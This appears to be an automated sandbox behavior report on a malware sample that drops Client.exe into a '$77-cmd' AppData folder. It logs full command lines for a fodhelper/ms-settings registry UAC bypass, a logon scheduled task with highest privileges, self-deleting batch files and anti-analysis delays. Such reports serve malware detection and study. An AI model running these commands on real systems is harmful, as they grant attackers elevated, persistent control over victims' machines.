                      Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: mrmcorer.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositorycore.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.ui.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: inputhost.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47mrm.dll
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                      Source: Dd5DwDCHJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Dd5DwDCHJD.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: Dd5DwDCHJD.exeStatic file information: File size 3268096 > 1048576
                      Source: Dd5DwDCHJD.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x31ce00
                      Source: Dd5DwDCHJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9B88D7F3 push eax; iretd 3_2_00007FFD9B88D871
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9BAF336E push eax; ret 3_2_00007FFD9BAF340C

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeFile created: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeFile opened: C:\Users\user\Desktop\Dd5DwDCHJD.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeFile opened: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeFile opened: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeMemory allocated: 1B350000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMemory allocated: 1B440000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMemory allocated: 1B230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeWindow / User API: threadDelayed 8736Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeWindow / User API: threadDelayed 1117Jump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exe TID: 7380Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exe TID: 7348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe TID: 8008Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe TID: 8012Thread sleep count: 8736 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe TID: 8012Thread sleep count: 1117 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe TID: 7680Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\timeout.exe TID: 7872Thread sleep count: 37 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Dd5DwDCHJD.exe, 00000000.00000002.1729416327.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000A.00000002.1726001426.0000000003556000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l2hGFS
                      Source: Client.exe, 00000003.00000002.4128730464.000000001C0AD000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Dd5DwDCHJD.exe, 00000000.00000002.1727919840.0000000001590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /fJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" "Jump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat" "Jump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\Melt.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2 /nobreakJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat"Jump to behavior
                      Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Install.exe" /f
